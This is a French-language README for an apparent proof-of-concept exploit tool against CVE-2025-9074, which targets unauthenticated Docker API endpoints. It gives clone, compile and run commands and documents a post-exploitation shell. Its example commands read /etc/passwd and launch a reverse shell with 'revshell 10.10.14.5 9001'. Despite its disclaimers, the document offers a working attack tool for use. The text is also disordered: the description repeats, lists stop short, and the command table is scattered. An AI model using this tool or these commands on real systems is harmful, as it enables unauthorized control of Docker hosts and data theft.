
Docker API CVE-2025-9074 PoC (Preuve de concept). Un framework d'exploitation sophistiqué pour CVE-2025-9074, ciblant les points de terminaison Docker API non authentifiés avec un shell de commandes interactif intégré.
Un framework d'exploitation sophistiqué pour CVE-2025-9074, ciblant les points de terminaison d'API Docker non authentifiés avec un shell de commande interactif intégré.
Cet outil automatise l'exploitation d'instances Docker exposées via leur API sans authentification, permettant de créer des conteneurs et d'exécuter des commandes sur l'hôte cible. L'outil dispose d'un shell interactif personnalisé pour des opérations de post-exploitation fluides.
Remarque : Il s'agit d'une implémentation PoC personnalisée. Je n'ai pas découvert CVE-2025-9074.

Détection automatisée des vulnérabilités, téléchargement d'images, création et initialisation de conteneurs

Shell de post-exploitation avec capacités d'exécution de commandes
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
ou vous pouvez télécharger le binaire depuis les Releases
./poc-2025-9074
Exécuter l'outil contre la cible par défaut (127.0.0.1:2375) :
./poc-2025-9074
Spécifier un point de terminaison d'API Docker personnalisé :

Une fois l'exploitation réussie, un shell interactif fournit les commandes suivantes :
| Command | Description |
|---|---|
cmd <command> | Exécuter des commandes arbitraires dans le conteneur |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 affecte les instances Docker dont les points de terminaison d'API sont exposés sans mécanismes d'authentification appropriés. Cette mauvaise configuration permet un accès non autorisé au démon Docker, permettant :
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
xwpd (@xwpdx0)
Licence MIT — Voir le fichier LICENSE pour plus de détails
Uniquement à des fins de divulgation responsable et de recherche en sécurité.
revshell <ip> <port>| Déployer un reverse shell vers l'écouteur spécifié |
info | Afficher les informations actuelles sur le conteneur et la cible |
exit | Terminer la session interactive |